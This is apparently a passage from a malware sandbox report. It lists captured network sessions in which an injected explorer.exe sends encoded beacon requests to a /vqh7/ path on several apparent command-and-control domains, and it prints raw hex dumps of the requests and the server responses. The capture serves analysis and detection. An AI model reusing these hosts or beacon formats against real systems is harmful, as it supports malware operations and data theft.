6b 63 74 5a 47 6e 31 6a 69 36 4e 43 68 35 56 67 4d 71 6c 4b 48 69 5a 6f 4a 36 34 58 5a 4c 4b 66 56 57 44 6f 35 28 69 31 75 57 58 56 52 77 57 37 6b 39 4d 51 74 72 4d 50 46 4d 64 4c 38 35 36 73 49 52 54 6c 41 33 73 53 39 7e 54 71 73 77 73 75 57 52 52 36 30 4f 30 67 44 77 73 75 52 52 51 46 66 35 63 58 5f 70 50 54 73 54 72 56 66 6d 62 4a 71 48 4d 34 57 43 77 62 79 6a 52 30 42 6d 51 67 30 32 71 70 4d 31 72 34 7a 55 63 73 48 67 5f 71 49 42 5f 74 34 62 75 28 50 58 51 43 4f 6f 30 6d 43 73 48 36 55 69 48 6b 76 68 73 32 77 52 32 28 49 6b 44 52 62 69 56 57 79 68 6b 79 66 54 63 47 4a 52 70 59 44 39 4d 5a 32 6a 64 78 54 72 36 4e 66 39 51 71 72 76 56 79 45 4d 64 6a 62 6e 5a 4c 42 4d 46 68 64 71 54 4c 54 67 59 53 49 4d 79 36 4f 6c 71 6e 74 76 77 37 37 4d 71 38 44 57 51 4b 68 66 46 69 5f 31 72 41 44 49 75 62 78 72 31 28 5f 53 68 6f 33 41 52 6c 4f 66 78 74 57 28 6c 38 38 55 38 67 6f 35 78 68 78 41 4f 47 43 33 52 36 71 4b 58 37 52 66 65 4d 48 5a 33 78 4c 32 32 49 68 38 61 49 74 76 38 59 70 73 39 79 68 68 36 74 54 71 38 34 48 4c 68 4a 70 34 78 74 32 52 6a 6f 47 62 33 54 6c 4c 63 78 72 47 47 64 59 28 45 53 31 42 75 33 37 37 71 78 65 45 69 4d 76 31 4f 43 50 43 42 56 32 51 66 77 35 6b 41 34 6b 6c 42 66 30 44 68 57 64 6a 71 54 73 68 47 69 39 42 32 72 33 31 55 42 35 37 78 44 70 62 78 6b 77 6b 64 30 63 33 38 6d 65 31 34 56 72 6f 33 63 30 35 61 42 47 48 67 56 67 7e 37 45 52 35 69 76 62 28 4a 61 35 4c 52 43 5f 7e 75 43 30 39 72 41 44 33 58 63 78 42 50 65 55 7a 6c 4c 58 73 66 47 6c 79 63 6a 33 77 54 50 45 79 32 32 37 7e 76 67 37 77 31 39 41 70 6a 79 46 6c 4f 67 64 63 6e 6f 67 77 43 31 76 49 78 57 72 68 43 4e 52 7a 75 31 68 38 6f 6e 52 70 72 43 43 42 70 50 4f 38 75 66 44 75 30 73 4c 73 33 79 50 65 31 4d 49 45 55 4f 6c 5a 69 35 4c 49 77 38 51 43 50 44 43 77 47 72 79 53 49 53 74 50 56 57 64 4c 4a 63 4a 4f 6c 58 5f 45 63 71 42 49 77 41 31 48 65 52 5f 6e 67 6c 61 62 61 72 75 53 68 72 33 31 67 7e 59 71 62 44 4f 28 50 4a 4a 54 63 30 6c 5a 35 61 62 4c 68 72 73 61 4c 41 55 41 30 4d 76 34 75 37 52 77 63 6d 33 38 66 7e 5f 79 62 6c 71 58 75 73 30 44 4e 75 43 42 38 43 64 46 4b 42 46 63 70 74 72 41 74 75 72 57 6b 49 65 34 37 54 44 6f 35 53 35 58 6b 53 6b 48 41 51 61 39 69 6f 59 71 63 54 52 67 46 6c 78 71 73 72 77 44 48 6f 48 45 49 4c 47 79 70 41 47 73 58 50 74 30 6b 4f 75 42 33 4a 47 38 75 5a 5f 69 75 33 57 74 44 44 4b 48 48 53 7a 55 38 6b 78 7e 7a 35 33 58 6d 77 71 28 4c 30 6d 49 4e 4b 33 49 79 46 45 78 4d 6a 70 63 73 52 70 4c 72 5a 74 73 6c 79 38 76 58 42 5f 43 64 76 5f 28 33 55 67 49 67 4a 36 32 5a 7a 74 44 73 6e 45 48 54 47 67 77 37 38 6d 46 75 6f 63 59 4f 67 44 72 4d 65 43 62 4f 30 74 64 66 54 74 44 5f 79 33 33 55 53 31 72 74 78 64 59 37 6a 5f 4d 62 72 61 44 79 74 38 47 34 4a 5f 53 57 32 45 75 49 39 33 56 61 35 36 5a 6c 4e 48 43 32 39 79 75 56 6f 66 45 66 62 4e 62 34 44 39 4a 2d 48 51 33 77 33 71 6d 79 35 4b 30 75 53 64 4d 71 32 51 56 70 69 65 79 46 7a 49 45 43 68 2d 57 4d 77 79
                                                              Data Ascii: u1ua=bYNcd61QtJbYWzRhDzrs84D-ibbuy1so1UnO16U9o4W-KQ~fSI~oSsbCjwl_rzUCfts_vcxJn9vv4dfQXKZMr4jGqPSLiQrpbi7ZpLxBCXLwRJnTeo6NhRjk2MbjYETiwIT6KKmBYV1Bu35EVsETbLQzu1wxystV7LVQyHtcZRyU~vKoz-TK~aZ5jiKz(7TsxFANd24b7ef6pF651JExiBmSJN0OSRt71omzLyPfKAh70F1u9pCQYPTWCxQglscyDdUuUpc7KpTWXQ5gFFCh427AfMgShA~3iVsdm5EJaPsttAwAiNS9~MEDItaBNzJRsIk7bU9WtlUMEEfYVPQuW6DShtHztymWjWHG8zdAkNqe2jzif-uMuwxZ7DK3LBMjAF(g8gLoGkctZGn1ji6NCh5VgMqlKHiZoJ64XZLKfVWDo5(i1uWXVRwW7k9MQtrMPFMdL856sIRTlA3sS9~TqswsuWRR60O0gDwsuRRQFf5cX_pPTsTrVfmbJqHM4WCwbyjR0BmQg02qpM1r4zUcsHg_qIB_t4bu(PXQCOo0mCsH6UiHkvhs2wR2(IkDRbiVWyhkyfTcGJRpYD9MZ2jdxTr6Nf9QqrvVyEMdjbnZLBMFhdqTLTgYSIMy6Olqntvw77Mq8DWQKhfFi_1rADIubxr1(_Sho3ARlOfxtW(l88U8go5xhxAOGC3R6qKX7RfeMHZ3xL22Ih8aItv8Yps9yhh6tTq84HLhJp4xt2RjoGb3TlLcxrGGdY(ES1Bu377qxeEiMv1OCPCBV2Qfw5kA4klBf0DhWdjqTshGi9B2r31UB57xDpbxkwkd0c38me14Vro3c05aBGHgVg~7ER5ivb(Ja5LRC_~uC09rAD3XcxBPeUzlLXsfGlycj3wTPEy227~vg7w19ApjyFlOgdcnogwC1vIxWrhCNRzu1h8onRprCCBpPO8ufDu0sLs3yPe1MIEUOlZi5LIw8QCPDCwGrySIStPVWdLJcJOlX_EcqBIwA1HeR_nglabaruShr31g~YqbDO(PJJTc0lZ5abLhrsaLAUA0Mv4u7Rwcm38f~_yblqXus0DNuCB8CdFKBFcptrAturWkIe47TDo5S5XkSkHAQa9ioYqcTRgFlxqsrwDHoHEILGypAGsXPt0kOuB3JG8uZ_iu3WtDDKHHSzU8kx~z53Xmwq(L0mINK3IyFExMjpcsRpLrZtsly8vXB_Cdv_(3UgIgJ62ZztDsnEHTGgw78mFuocYOgDrMeCbO0tdfTtD_y33US1rtxdY7j_MbraDyt8G4J_SW2EuI93Va56ZlNHC29yuVofEfbNb4D9J-HQ3w3qmy5K0uSdMq2QVpieyFzIECh-WMwydZxDMNc4bJMi0FrSCGQ7hbwyOqntakNnwKLLojYPYfYMBkKz8NJjiUy_a8bqOA2IHu0ky40KnXsgAUJo36ZGUwJsGFOyIQzJpK1TQoJI5YVGNa1iw0UncWe8xw4WVo74fhT5XO~JT1nG5SWbLKxExIp7Dos1vRIAg7sKwJ7aI3Co~b5I23Nn5g2NJofVbG40cnkrh-TPvQ0MfsdO2GjU1vj1KBCt1K2N6s4ZvtRGEuaeIGyyrIskAWZvBhCzQDL8~VYCIHXk0fmjRUZ-6byiyFrOk4tm2URy(0c-OOj2vFuV(kfCGyDwaNzA3dhs32tpT5ll6gOifvLCl6NCi0W0ZS4D3wFbEPxeg1jkN0y4vVLep8CeNU34gFzY(mXRaAIm3PJxCm0u3m5Or_HEDr05p_1WsdLcdGN5mzsHvk2myDVZJ0TaPkTonc5fNtKyZefOxeDTix3fsNxIMahwVBg1TTwZa9ZuSm84xmXgls37TeZ8RLj375LgWHMEgRqfC5ZvVS2RYAuTzyffHd49oEbsBtaiiMgTkWBdCTLy03w14lcj6C1JQM3QO-akjBqqmlh8Z_0tWM3sRfd0D9Buy5TZEVsmxffjPtd7EoGbBprKDhsicq9lveoexMigRCq8p5PCKB6aHqyRFeSCLJ(4upe9ZRBKx_I23iLUzJW0h8seCi29IxZn96tHwLHqrE3Kn4ozkZ0Bz5iX5iNZ3PE02ut8XCfDmL94cuQ5CrvJfS(-PtNDmmthOrEnpTeYxo7Muy9jKwhF8arKkIMq6bcdxUsCoopJ2WbbTN1Lg8b3W0ZVMnq5UcZuk8xd0H8Aylql7xYgX6Ihvuukhok2SQL0eaOG5orljP3cHkD1rkBi7P9Tak4UnCzKHUoX~FZdnUU3fYiXYOjlaLLODHN7otrv0ucDoYcBufauRVS3TVajzd3sjYIKOHwQoZLHlQPySCmHrlkiUrwF8spZSHy9boJrz7HH85BbO3d0GTMz23HydbFb8mfS6W8_kjUI7b8_LuhuyAW5R1wGWR4HUpNnLiFNmUfXiSqHm3WWum0fabxzcNgSYFchV8foGLojD1VlblqHDwCs6lGMbs93~Snqy40I3Bx5R3QV71sgwefTtIzuz9R5VAYBBLI3zlgGBCBLIUvfb8x_JtF-LrZrThug0xpId7aR(Gw_foebKqX9(qGI6WAw1ais64r8B8LP8wOTenb1PAidaBIr8Z(AAWEtgqnLCisKaw5C8LmnhgpAcQrEHAKUZIf71wOhL0tvyztqzFYRu8Quw60Tn2xDeEmFoVm9D0fzipPHA4j2N2lCUoP_xg1Yb_l3NVhS35YXHAbN5-m3tDEbwtRRmg2CMXzq72tLmfJ0qP(3S_4KCXOdImZ_kXYzua2fshmeq-Kv2ypPKGzYkgyw6ShZDSSHhwdeCSXIHbUKgC5xYyh3GlxVnN3I3XnmT-qCLENVp79K4ySfw72xGWab1AgiWHyp83cRkF1qnaaf21UjnCUGa0jMI8SFbPoIgb1RjLzsoUx6RmZLPu93PmrRd5kjHCAhbz48RUxCrnOHU7T8grwqvO4gRoVPIFebQCKI(gi-kLM0tDakXvZgaBYL1EANuHwthyb2bC2ONHyOTz8Y2QOrz1bQw9FbH-NezJrkghaczonl9TXtP_G7v5nWBfhaMlS1iUNhlQBAitG0LDhd7PQJJYvPFHtTJDApLhTftX85U9vqNJIQm3(Qh0GNBNedRxUjR0WPryT1LHJYXyZ58I9VStq58EqF5uAMr2MbMvOVy9(_aaR0Zgkj8a(P(SHOCNA35Ld1(IdEM7dhz3TvHd6tKAS9uYT6C1An97bxTEWBKsNwqyJ54Ys_ZypJ10DTafowcXa2~kN0fj6a5mruRDNR(YcJsqAB8mZOBLvt1SOExblIAxB0NrXSM2p2uzauNEq6uoB5dhDMbwTuyp8xFEOWILM_CA5mXTrMzOz8W_Pdfa8vMwKrhM5qtqK4ltlzOCTeNiNuQvZUz2evYOlVPmrfKL56F2D2Mb3RR4K5pzM7TPNZjIL2ShM-Jb(0XTNN0FaQE3B2(FbD0sbm9Bher5TIw_yIDUel8pDZ2rurEFtEYGi4UgX4sdgx5ClMFpiWFBeiiso32py3Y6v2J_UnKarxs_meq5t2DkiijSr6zoIkN4n0EpIvo0olUlsL8AX0scYeqtSXUKjIpokoufcoRJKUW1INJHE_FvWubQRwnJ7ZLkDdML6njb0N9v8ncjBdoDoALkTgwVEGX5~vy-4blSK_vIN5OX3vFtchFbjVD5kP7CgWVBsAzs6p0q~tWz3wtYLBpcD-GT88uETCFOBUF2BtQ6UIcMmh1HL8sboyxzYmlPtvmbZPsnUyWuuyi3IMYB7SVkdxSnjhoUqILfGjr-WNgiVU0Fj5(qMz5icK6DrNNhyjtrPvRinb4EohEZ39Nw7IcnoTiB34d9~B6iaRfpceweDtsg5S2BmM91rVzrwiMd5tua77FCHiEtsDPfWPpLzdu-8UVfD-Xas8aPVZposm(go_FxP9JCGnwdKXxLin8n6kjc9fok4iNJmjxJfqS0CLYzb85T8SZ7Pk7FVLKOOM8iZPx7aR7hNlo7jYujTxJ6XL3YRBvRbP8K~sWDg4u63dD8W2S4EdlzLVbd7e4TJh1T50hDtjQXSpsU6Y4VC40gRkHLC_nEhEfhgBjQjKYwgJlLQYB2QsVYZfQJ1GmMRudSHaXP0
                                                              Feb 10, 2023 12:46:24.670975924 CET234INHTTP/1.1 403 Forbidden
                                                              date: Fri, 10 Feb 2023 11:46:24 GMT
                                                              content-type: text/html
                                                              transfer-encoding: chunked
                                                              vary: Accept-Encoding
                                                              server: NginX
                                                              content-encoding: gzip
                                                              connection: close
                                                              Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              3192.168.2.349686199.192.22.19880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:06.220357895 CET135OUTGET /vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.specigain.online
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:06.542025089 CET135INHTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:06 GMT
                                                              Server: Apache
                                                              Content-Length: 570
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              4192.168.2.349687103.191.208.5080C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:11.737200022 CET137OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.treebarktees.com
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.treebarktees.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.treebarktees.com/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 58 74 50 4e 63 45 49 6e 7e 62 62 56 31 66 74 61 6d 51 36 59 36 78 6f 6f 56 6d 30 71 65 4e 41 5f 6f 48 79 48 4f 59 67 4a 6a 7a 6e 45 46 69 76 4f 59 61 46 4b 6e 6a 47 37 46 6d 4c 70 70 53 67 50 4e 79 69 50 42 6e 33 57 50 62 6d 43 47 4a 63 34 67 68 46 6c 64 71 71 45 42 2d 37 65 78 57 6e 33 49 34 67 78 77 76 41 34 39 75 47 4d 72 59 65 6c 28 67 54 69 4d 57 79 43 50 63 79 62 36 6d 76 76 36 79 5a 37 4a 31 42 37 64 4b 61 71 45 70 41 2d 28 30 61 4a 30 4b 4f 70 69 36 35 78 28 37 72 38 62 64 36 76 6b 4c 57 34 48 6b 69 6f 33 77 64 55 28 51 29 2e 00 00 00 00 00 00 00 00
                                                              Data Ascii: u1ua=XtPNcEIn~bbV1ftamQ6Y6xooVm0qeNA_oHyHOYgJjznEFivOYaFKnjG7FmLppSgPNyiPBn3WPbmCGJc4ghFldqqEB-7exWn3I4gxwvA49uGMrYel(gTiMWyCPcyb6mvv6yZ7J1B7dKaqEpA-(0aJ0KOpi65x(7r8bd6vkLW4Hkio3wdU(Q).
                                                              Feb 10, 2023 12:45:12.642971992 CET138INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Fri, 10 Feb 2023 11:45:12 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-powered-by: PHP/8.1.15
                                                              x-litespeed-tag: 90d_HTTP.404
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                              x-litespeed-cache-control: no-cache
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              x-turbo-charged-by: LiteSpeed
                                                              Data Raw: 34 32 36 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 7b 73 e3 b8 b1 38 fa f7 b8 ea 7c 07 2c a7 76 6d 25 24 45 f0 25 4a b6 9c 93 cc 6e ce 6e d5 6e 92 ca 6c f6 d4 af 32 5b 2e 88 84 24 8e 29 92 21 29 cb 5e 1f 57 dd af 71 bf de fd 24 b7 ba 01 92 90 44 3d 6c d9 f9 9d 3c f6 31 43 91 40 77 a3 d1 68 34 1a 8d c6 d5 17 5f ff f1 c3 8f ff e7 4f df 90 79 b5 48 ae cf ae e0 2f 92 b0 74 36 d6 78 6a fc e5 a3 06 ef 38 8b ae cf de 5d 2d 78 c5 48 38 67 45 c9 ab b1 f6 97 1f 7f 6f 04 1a e9 37 5f 52 b6 e0 63 ed 2e e6 ab 3c 2b 2a 8d 84 59 5a f1 b4 1a 6b ab 38 aa e6 e3 88 df c5 21 37 f0 87 4e e2 34 ae 62 96 18 65 c8 12 3e a6 08 87 c8 7f ae ca ea 21 e1 d7 67 f5 6f f8 db 5c 65 f9 c4 28 57 ac 0a e7 e4 71 ed 13 7c 5e c4 a9 80 3c 22 b6 97 df 5f 76 16 98 f3 78 36 af ba 4a 3c ad 95 5f c3 15 2f 66 1d f8 b0 15 5d 90 80 98 63 f0 5c f5 65 23 cf 04 5b 91 79 e7 45 36 c9 aa f2 bc 61 dd f9 82 dd 1b f1 82 cd b8 91 17 1c 58 3b 4a 58 31 e3 e7 c0 f6 ab 2a ae 12 7e fd 27 36 e3 24 cd 2a 32 cd 96 69 44 be 7a 1f d8 94 5e 92 1f 0b ce 27 ac b8 bd ea 8b 62 67 57 49 9c de 92 82 27 e3 f3 28 2d 01 de 94 57 e1 fc 9c cc 0b 3e 1d 9f f7 fb 95 ac 51 71 5e 9a 61 b6 10 48 9a 5a 1a 4b 2a 5e a4 ac e2 1a a9 1e 72 3e d6 58 9e 27 71 c8 aa 38 4b fb 45 59 fe fa 7e 91 68 04 b1 8d b5 1a 3d f9 aa 60 7f 5b 66 97 e4 f7 9c 47 9a c0 a5 cd ab 2a 2f 47 db 18 fb 71 1a f1 7b 33 9f e7 fd 29 e7 51 1f a5 a2 a5 fb 44 0a 3e 64 8b 05 4f ab f2 b9 a4 84 b2 9e 4a 53 19 16 71 5e 5d 9f ad e2 34 ca 56 e6 cd 2a e7 8b ec 73 fc 91 57 55 9c ce 4a 32 26 8f da 84 95 fc 2f 45 a2 8d 64 7b 3f f5 3f f5 4b 73 65 66 c5 ec 53 1f 3b b5 fc d4 0f b3 82 7f ea 63 e5 4f 7d ea 9a 96 69 7d ea 0f ec fb 81 fd a9 af e9 1a bf af b4 91 66 e6 e9 4c d3 b5 f2 6e f6 32 78 e5 dd 0c a1 95 77 b3 6f 04 c0 f2 0e 01 66 cb 22 e4 da e8 51 0b b3 34 64 15 92 21 e9 1d 01 b9 9b 22 f1 a9 bf ca 8d 38 0d 93 65 c4 cb 4f fd cf 25 be c0 6a 46 c1 13 ce 4a 6e 2e e2 d4 fc 5c fe e6 8e 17 63 df a4 26 d5 9e 9e 2e cf fa bf fa 82 fc 38 8f 4b 32 8d 13 4e e2 92 b0 65 95 19 33 9e f2 82 55 3c 22 bf ea 9f 7d 31 5d a6 21 c8 d2 05 d7 99 5e f5 1e ef 58 41 52 bd d0 33 3d 1e 33 33 2c 38 ab f8 37 09 87 3e bc d0 42 96 de b1 52 eb e9 f9 38 36 67 bc fa 00 ca e6 be fa ea 2b f5 d7 85 66 47 5a ef b2 06 4c ca 0b 5e 03 66 e3 8f 55 11 a7 33 73 5a 64 8b 0f 73 56 7c c8 22 ae f3 f1 45 6e 86 09 67 c5 9f 79 58 5d 58 ba a5 c7 a6 d0 58 b1 29 86 75 4f cf cd 69
                                                              Data Ascii: 4269{s8|,vm%$E%Jnnnl2[.$)!)^Wq$D=l<1C@wh4_OyH/t6xj8]-xH8gEo7_Rc.<+*YZk8!7N4be>!go\e(Wq|^<"_vx6J<_/f]c\e#[yE6aX;JX1*~'6$*2iDz^'bgWI'(-W>Qq^aHZK*^r>X'q8KEY~h=`[fG*/Gq{3)QD>dOJSq^]4V*sWUJ2&/Ed{??KsefS;cO}i}fLn2xwof"Q4d!"8eO%jFJn.\c&.8K2Ne3U<"}1]!^XAR3=33,87>BR86g+fGZL^fU3sZdsV|"EngyX]XX)uOi
                                                              Feb 10, 2023 12:45:12.643018961 CET139INData Raw: 9c 24 3f f2 fb ea 82 99 30 06 1e 2e aa 79 5c ea bc a7 5b ba d5 d3 63 b3 ca be 66 15 fb cb 9f bf bf e8 f5 2e 0b 5e 2d 8b 94 bc 1c 6e 25 e1 f2 f1 78 bc 06 fb a9 69 58 78 c1 05 bf aa 6d 4e 09 51 d5 7a 97 95 59 16 e1 98 eb 95 19 f1 29 2f c6 95 29 86
                                                              Data Ascii: $?0.y\[cf.^-n%xiXxmNQzY)/)11YRgPw?_h0hZ?Cy}ItQYq[B&dKROrP/yF_Xzbl]WtV/_Bku"[z*EnB~J)kUk{LJ
                                                              Feb 10, 2023 12:45:12.643050909 CET141INData Raw: f7 97 50 5e 08 22 48 a3 32 5d e1 e4 80 92 5c 4a c1 6d 3f 3e fd 27 6a 5a 72 d1 3a 7e 06 81 9d df f7 1e 5b 96 d4 84 b5 08 d2 6c 1d c5 93 22 f0 b2 b4 c9 0a 6e d4 f3 53 f2 20 66 28 1e 19 55 96 3f aa 04 21 d0 b2 62 45 75 3c 8c 90 a7 15 2f d6 c0 88 57
                                                              Data Ascii: P^"H2]\Jm?>'jZr:~[l"nS f(U?!bEu</W]4jY/lNK#*Xx##KE6#2.GTxvu)X-!&"[685nh#"bD=T[e/4x-6joYQ)lGuLIsy$F)x-y2
                                                              Feb 10, 2023 12:45:12.643084049 CET142INData Raw: c6 88 96 d2 a8 b1 4a 05 bb 11 71 d8 f7 b2 4a d5 7b a3 40 20 6c cd 6d d6 c1 be b5 05 87 a5 80 ee 68 58 37 ab eb 01 df ec 68 60 78 db 05 35 69 af bb 82 50 1a 72 c3 a5 15 5f 75 4e 69 df 1a 2c 0d e7 59 b1 43 b4 bb eb 74 bf 95 90 46 2c ac e2 3b fe 8a
                                                              Data Ascii: JqJ{@ lmhX7h`x5iPr_uNi,YCtF,;Q"f 2E![x_a$,+FmvzdS{2-/Yk N#4"@E9Bn`s5S,9b"tj`Y];."L&I++cIv4
                                                              Feb 10, 2023 12:45:12.643120050 CET143INData Raw: 7b c0 78 29 c5 65 15 c5 8b c7 3c 2b 45 8c 11 9b 94 59 b2 ac f8 65 0c 11 cd 10 95 db 1c 14 af c3 2c d6 55 70 07 a6 16 5a c1 13 06 21 30 6f 42 f7 0c 02 a5 78 da e1 83 c6 60 a6 9c 41 14 fc 9b 60 8e e2 85 61 3d 66 39 0b e3 ea 61 a4 4e c0 1d dc 78 79
                                                              Data Ascii: {x)e<+EYe,UpZ!0oBx`A`a=f9aNxyEb^`_y3,Ey]y+XTe`Y[KfXaV3!%L3xP&A9b`kC!_8_dp5wWjyjM(_MTA4<
                                                              Feb 10, 2023 12:45:12.643151999 CET145INData Raw: 6d 80 78 01 e7 36 20 ec e5 5c bc 98 fd 35 4c 58 59 fe 6a 0c 79 3f 31 f3 fe cf bd 47 75 20 ac bb e5 9f a6 f1 6c 59 f0 66 a1 4b 2c f0 2f 74 2f 41 66 49 36 81 2b 0f 60 e1 bf 71 e4 7d 92 45 0f 62 f9 d1 18 ab 28 b5 86 31 49 58 78 3b 22 10 9b 0c 51 af
                                                              Data Ascii: mx6 \5LXYjy?1Gu lYfK,/t/AfI6+`q}Eb(1IXx;"Q7k-gI:W#~tY<NtDL.+6cyNmnnxrfV@^D]~NvW;I$'rM}k#&R3xDaw@m0GpQ-YzUv@
                                                              Feb 10, 2023 12:45:12.643183947 CET146INData Raw: de bb 84 4d 1d 8b 8a 3a 39 45 db 08 82 b6 00 9f a0 6b 76 40 ac 35 8d db 38 a2 d6 e5 42 25 61 5d cf 1c 64 85 a2 63 70 6b 64 9d 75 33 96 1b 06 5c e4 09 50 c1 24 db 62 2e 96 98 67 45 fc 0b c4 56 25 23 8c 55 83 2e d7 e1 16 a4 4d 6d 83 a5 eb 90 ed 03
                                                              Data Ascii: M:9Ekv@58B%a]dcpkdu3\P$b.gEV%#U.Mme%GW^X,(Dd+( 6"/( V:q} -+0r!dC,#i.QtkFUk"aG"Ru))IZj[ln&G
                                                              Feb 10, 2023 12:45:12.643215895 CET147INData Raw: 56 cb 75 3d b9 d4 51 35 62 62 95 2b fb 43 c0 37 81 74 e0 91 33 d4 0b 28 3f 62 66 7a 01 d4 23 67 a4 17 40 16 63 fc 59 33 d1 0b b0 6c 4c 04 62 f5 d1 c1 f7 8d 72 72 06 3a 1d e1 f1 33 cf 4b 70 bd 64 c6 79 01 9e 17 cc 34 2f c0 f2 fc 19 e6 05 48 9e 3b
                                                              Data Ascii: Vu=Q5bb+C7t3(?bfz#g@cY3lLbrr:3Kpdy4/H;`$/wy31^{4-z,I&}]Zhc@(6c$m#t~@Nh]gp5M<aJ;&y;h:ID'n4|5\-GN
                                                              Feb 10, 2023 12:45:12.643249035 CET149INData Raw: 6d 6b 9b 9e 49 b7 6d db 03 b4 fe 6d 19 87 b7 77 31 5f bd 01 b5 0d 6c a4 b7 f9 75 22 c5 77 ac 88 d1 e3 65 94 2b 56 85 73 5e be 01 e9 0d 92 9b 1a 09 b6 61 fb f5 89 8d 59 c5 e5 bc bd fb e7 99 2b 9f fd b2 52 83 16 ee 04 89 e7 10 b9 65 58 c4 79 45 aa
                                                              Data Ascii: mkImmw1_lu"we+Vs^aY+ReXyE58d/U<1.wWQ|G0SXSVJqj$b3hR<==](y8~LX0-1]Zq9Ny\&H\IpVr(N9\.Hl1S2
